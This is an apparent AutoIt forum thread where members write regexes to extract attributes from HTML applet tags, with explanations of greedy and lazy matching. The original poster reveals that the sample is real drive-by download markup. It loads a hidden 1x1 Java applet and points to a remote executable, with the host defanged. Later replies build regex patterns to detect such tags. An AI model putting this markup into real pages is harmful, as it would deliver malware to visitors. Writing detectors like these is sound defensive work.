Sign in to follow this  
Followers 0
DeltaRocked

Regex for applet

10 posts in this topic

hello,

I need help in generating a single regex for the following.

<body>
<applet archive="h__p://www.w______y.com/userfiles/file/Applet.jar" code="ScriptEngineExp.class" width="1" height="1">
<param name="data" value="h__p://www.w______y.com/userfiles/file/Applet19.exe"/>
</applet>
</body>

Presently using 4 different regex's for the above mentioned string starting with applet archive: I need to retrive the url, code, width and height.

Secondly, there can be multiple applets, hence I am extracting the text from <applet to /applet> and then executing four regex statements.

applet_archive= (?i)(?:<[\s*]{0,1}applet[^>]*)archive[\s*]?=[\s*]?["']{0,1}(.*?)['"]{0,1}(?: |>|\s)
applet_class= (?i)(?:<[\s*]{0,1}applet[^>]*)code[\s*]?=[\s*]?["']{0,1}(.*?)['"]{0,1}(?: |>|\s)
applet_width= (?i)(?:<[\s*]{0,1}applet[^>]*)width[\s*]?=[\s*]?["']{0,1}(.*?)['"]{0,1}(?: |>|\s)
applet_height= (?i)(?:<[\s*]{0,1}applet[^>]*)height[\s*]?=[\s*]?["']{0,1}(.*?)['"]{0,1}(?: |>|\s)

Share this post


Link to post
Share on other sites



Are the parameters all the time the same?

#include<Array.au3>
$str = '<body>' & @CRLF & _
'<applet archive="h__p://www.w______y.com/userfiles/file/Applet.jar" code="ScriptEngineExp.class" width="1" height="1">' & @CRLF & _
'<param name="data" value="h__p://www.w______y.com/userfiles/file/Applet19.exe"/>' & @CRLF & _
'</applet>' & @CRLF & _
'</body>'
$re = StringRegExp($str, '"(.*?)"', 3)
_ArrayDisplay($re)

Scripts & functions Organize Includes Let Scite organize the include files

Yahtzee The game "Yahtzee" (Kniffel, DiceLion)

LoginWrapper Secure scripts by adding a query (authentication)

_RunOnlyOnThis UDF Make sure that a script can only be executed on ... (Windows / HD / ...)

Internet-Café Server/Client Application Open CD, Start Browser, Lock remote client, etc.

MultipleFuncsWithOneHotkey Start different funcs by hitting one hotkey different times

Share this post


Link to post
Share on other sites

Or even something like this:

#include<Array.au3>
$str = '<body>' & @CRLF & _
  '<applet archive="h__p://www.w______y.com/userfiles/file/Applet.jar" code="ScriptEngineExp.class" width="1" height="1">' & @CRLF & _
  '<param name="data" value="h__p://www.w______y.com/userfiles/file/Applet19.exe"/>' & @CRLF & _
  '</applet>' & @CRLF & _
  '</body>'
ConsoleWrite(StringRegExpReplace($str, '(?s).*archive="(.*?)".*code="(.*?)".*width="(d+)".*height="(d+)".*', 'archive: $1' & @CRLF & 'class: $2' & @CRLF & 'width: $3' & @CRLF & 'height: $4') & @LF)

Scripts & functions Organize Includes Let Scite organize the include files

Yahtzee The game "Yahtzee" (Kniffel, DiceLion)

LoginWrapper Secure scripts by adding a query (authentication)

_RunOnlyOnThis UDF Make sure that a script can only be executed on ... (Windows / HD / ...)

Internet-Café Server/Client Application Open CD, Start Browser, Lock remote client, etc.

MultipleFuncsWithOneHotkey Start different funcs by hitting one hotkey different times

Share this post


Link to post
Share on other sites

#4 ·  Posted (edited)

deltarocked,

I am trying to get regexp so thought I would take a whack at this. I came up with the following:

StringRegExp($Value, "archive="(.*?)"|code="(.*?)"|width="(.*?)"|height="(.*?)"", 3)
however, it returns an array with blank elements between the results that I expect. I hope that this helps and that one of the regex mavens will enlighten us (jeez, watching too much television).

kylomas

edit: additional data

I'm using the regex tester by szhlopp found at http://www.autoitscript.com/forum/topic/...ester-v2/page__view__findpost_

edit2: figured out that the problem is the space delimiting the pattern but do NOT know how to NOT return the space as a match

Edited by kylomas

Forum Rules         Procedure for posting code

"I like pigs.  Dogs look up to us.  Cats look down on us.  Pigs treat us as equals."

- Sir Winston Churchill

Share this post


Link to post
Share on other sites

I am trying to get regexp so thought I would take a whack at this. I came up with the following:

StringRegExp($Value, "archive="(.*?)"|code="(.*?)"|width="(.*?)"|height="(.*?)"", 3)
however, it returns an array with blank elements between the results that I expect. I hope that this helps and that one of the regex mavens will enlighten us (jeez, watching too much television).
kylomas

In this case the 'or' | is not appropriate. You should use wildcards between the parts to be captured.

Like this

$aResult=StringRegExp($str, 'archive="([^"]*).*code="([^"]*).*width="([^"]*).*height="([^"]*)', 3)

or this

$aResult=StringRegExp($str, 'archive="(.*?)".*code="(.*?)".*width="(.*?)".*height="(.*?)"', 3)

"Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the universe trying to build bigger and better idiots. So far, the universe is winning."- Rick Cook

Share this post


Link to post
Share on other sites

Bowmore,

Thank you, I see it now!!

kylomas


Forum Rules         Procedure for posting code

"I like pigs.  Dogs look up to us.  Cats look down on us.  Pigs treat us as equals."

- Sir Winston Churchill

Share this post


Link to post
Share on other sites

#7 ·  Posted (edited)

Apologies to deltrocked for intruding...

@Bowmore,

When I use pattern #2 it works perfectly, however, when I do this

archive=(.*?).*code=(.*?).*width=(.*?)
intending to get the same strings including the quotes I get two blank elements and a match on the third. ???

kylomas

edit: I think this is because I do NOT have a terminating delimiter, but how to include the quotes and use the quotes as the terminator?

edit2: got it by doing this

archive=(".*?").*code=(".*?")
Edited by kylomas

Forum Rules         Procedure for posting code

"I like pigs.  Dogs look up to us.  Cats look down on us.  Pigs treat us as equals."

- Sir Winston Churchill

Share this post


Link to post
Share on other sites

Don't miss a question mark in case it's needed either. It isn't the actual case here but that is worth knowing.

You see, by default, PCRE is "greedy", which means that an unlimited repetition (+ or * or {n,}) will match the longest string possible. This is particularly important when .* is used.

E.g. the pattern '(.*)abc' applied to 'xxxxxxxxxxxxxabcyyyyyyyyyyyyyyyyyabczzzzzz'

matches 'xxxxxxxxxxxxxabcyyyyyyyyyyyyyyyyyabc'

In other terms, PCRE makes .* match the longest string that still doesn't cause the rest of the pattern to fail.

Now use a non-greedy pattern by applying the ? qualifier (which is nor the same as the ? "optional" modifier which is a synonym of {0,1}) and things change:

the pattern '(.*?)abc' applied to 'xxxxxxxxxxxxxabcyyyyyyyyyyyyyyyyyabczzzzzz' matches 'xxxxxxxxxxxxxabc'

that is the shortest string that still doesn't cause the rest of the pattern to fail.

So in the above post, when you have archive=(".*?").*code=(".*?") you rely on the line not having more than one occurence of code=.

Else you find yourself in situation 1 above (too greedy). This in fact may happen since line breaks between html markup are completely unimportant and there may be none or many.


This wonderful site allows debugging and testing regular expressions (many flavors available). An absolute must have in your bookmarks.
Another excellent RegExp tutorial. Don't forget downloading your copy of up-to-date pcretest.exe and pcregrep.exe here
RegExp tutorial: enough to get started
PCRE v8.33 regexp documentation latest available release and currently implemented in AutoIt beta.

SQLitespeed is another feature-rich premier SQLite manager (includes import/export). Well worth a try.
SQLite Expert (freeware Personal Edition or payware Pro version) is a very useful SQLite database manager.
An excellent eBook covering almost every aspect of SQLite3: a must-read for anyone doing serious work.
SQL tutorial (covers "generic" SQL, but most of it applies to SQLite as well)
A work-in-progress SQLite3 tutorial. Don't miss other LxyzTHW pages!
SQLite official website with full documentation (may be newer than the SQLite library that comes standard with AutoIt)

Share this post


Link to post
Share on other sites

#9 ·  Posted (edited)

hello everybody,

a little bit of history about this snippet . This snippet is an actual working DriveBy Download html code. and all driveby downloads which are based on Java have the same syntax but nothing can be said about their positions or the "Line Feed" or the Spaces between them.

code="ScriptEngineExp.class" width="1" height="1"

These 3 parameters are a gievaway that this is a malacious code

Logical reasoning: Width and Height cannot be 1 or less than 50 unless the intent is malicious. These dimensions are viewed by a user

ScriptEngineExp.class is a java class which executes commands. :)

The individual regex's which I have written essentially cover all the tricks used by hackers to ensure that it returns on exact value , irrespective of the " or ' or no quotes , cuase anything can be used in HTML and still it is parsed.

Thanks again for the efforts and the discussion.

Regards

Deltarocked

Edited by deltarocked

Share this post


Link to post
Share on other sites

Try this one

(?i)code=[x22x27]?script.+?.class[x22x27]?s*width=[x22x27]?d[x22x27]?s*height=[x22x27]?d[x22x27]?

I could probably shorten it down but it should work as is.


George

Question about decompiling code? Read the decompiling FAQ and don't bother posting the question in the forums.

Be sure to read and follow the forum rules. -AKA the AutoIt Reading and Comprehension Skills test.***

The PCRE (Regular Expression) ToolKit for AutoIT - (Updated Oct 20, 2011 ver:3.0.1.13) - Please update your current version before filing any bug reports. The installer now includes both 32 and 64 bit versions. No change in version number.

Visit my Blog .. currently not active but it will soon be resplendent with news and views. Also please remove any links you may have to my website. it is soon to be closed and replaced with something else.

"Old age and treachery will always overcome youth and skill!"

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0

  • Similar Content

    • ISI360
      By ISI360
      Hi!

      I need a little bit help from some RegEx experts please:
      I would make my ISN AutoIt Studio faster when generating the scripttree. And what would be better to do this via regex?
      Problem is i am not really good at this regex stuff. So maybe someone could help me here.
       
      The challange is to get all Global Variables from a script via RegEx in a Array.
      Here is a example script with some tests:
      Global $Var1 = 1234 Local $Local_Var = 1234 $Ignore_me_too = 1234 Global $Var2 = 1234, $var3 = 1242 Global $ahIcons[30], $ahLabels[30] Global Const $Var4 = iniread($inivar1,"jj","jj","") , $var5= iniread($inivar2,"jj","jj","") Global $Var_String = "was" Global $Array_Test[16] = [1,15,16,0,31,15,25,15,25,30,8,30,8,15,1,15] Global Enum $MARGIN_SCRIPT_NUMBER = 0, $MARGIN_SCRIPT_ICON, $MARGIN_SCRIPT_FOLD Global Const $Delim = '\', $Delim1 = '|' Global $hard1 = "a", _ $hard2 = "b", _ $hard3 = "c"  
      The returning array should look like this:
      $Var1 $Var2 $var3 $Var4 $var5 $Var_String $Array_Test $MARGIN_SCRIPT_NUMBER $MARGIN_SCRIPT_ICON $MARGIN_SCRIPT_FOLD $Delim $Delim1 $hard1 $hard2 $hard3  
      I already made some success with a expression i found in the SciTE Jump Tool:  (\$\w+)(?:[\h\[.=+*/^,)\-])?
      This nearly returns the perfect results. But it does not check if it´s a global variable (with the const and enum options) and also returns variables in commands (for example $inivar1)
      I also found this regex: (?im:^(?=Global|Const|Enum|Static)(?:Global)?\h*(?:Const|Enum|Static)?(?:(?<=Enum)\h+Step\h+[+*-]\d+)?\h*)([^\r\n .\=]+)
      This returns also usefull results...but trying to understand this explodes my head

      Maybe someone can help me here?
      Thanks in advance!
    • TheAutomator
      By TheAutomator
      Can anyone tell me why this isn't working?..
      #include <array.au3> $regexp = StringRegExp("test 'a b c'", "'([^']|'')*'|\S+", 3) _ArrayDisplay($regexp) trying to split this "test 'a b c'  'some other '' test'' ...'" into:
      0: test
      1: 'a b c'
      2: ...
      but it gives me:
      0: test
      1: c
    • anthonyjr2
      By anthonyjr2
      Hi guys,
      I am pretty bad with regex, and am having some trouble trying to come up with an expression for a certain type of string. Basically I want to be able to tell if a string is of the format:
      AA#####A
      Where the A's are any letter from A-Z and the #'s are any digit from 0-9.
      I've been playing around with a regex tester online for a while but I can't really seem to grasp the concept very well. Could anyone give me any tips?
      This isn't exactly an AutoIt specific question which is why I didn't post it in General Help & Support.
    • tezhihi
      By tezhihi
      I have a file (see attached file) with a string all line and this problem on here is I want to separate all $00:, $03:, $10:, $20:, $25:, $30:, $40:, $45:, $110:, $115:, $120: and $T. It's mean that each $ with value start a new line ( a new paragraph). I tried with Regular Expression in notepad++ ex:
      Find ($00:, $01:, $03: and so on) with regex (\$)([0-9]+): and replace is \r\n\1\2 (I think \r\n is @CRLF (not sure :() ) Find $T with regex (\$T)(.*?)(\$T) and replace is \1\2\r\n\3 When I try these regex to replace in notepad on StringRegexReplace the results is incorrect . I have read some example simple about regex. Please advise me how to do that with some example on autoit . The result will be in attached photo. Thanks 
      ahihi.txt

    • MyEarth
      By MyEarth
      Hello, i need to validate a string can be different things. I just need a True - False return value, no groups or things like that. It will be always one line at time to be processed by StringRegEx
      Valid:
      13:52|String
      02:52 XX|String
      13:52~SUN, MON, TUE, WED, THU, FRI, SAT|String
      02:52 XX~SUN, MON, FRI|String
      22/04/2017 13:52|String
      22/04/2017 02:52 YY|String
      Not Valid
      22/04/2017 13:52~Dom|String
      I need to validate until and inclusively the | after that i don't care
      The XX and YY value are two $sVariable from my script
      SUN, MON, TUE, WED, THU, FRI, SAT are fixed value, the can be mixed but always in the same order like
      SUN
      SUN, TUE, WED
      SUN, SAT 
      The time can be 12 or 24 hours, the date is always in the same format DD/MM/YYYY. If there is a date can't be a day after that ( see not valid )
      Well i think is all
      Sorry if i don't provide a working code, regex is too way complex.
      Thanks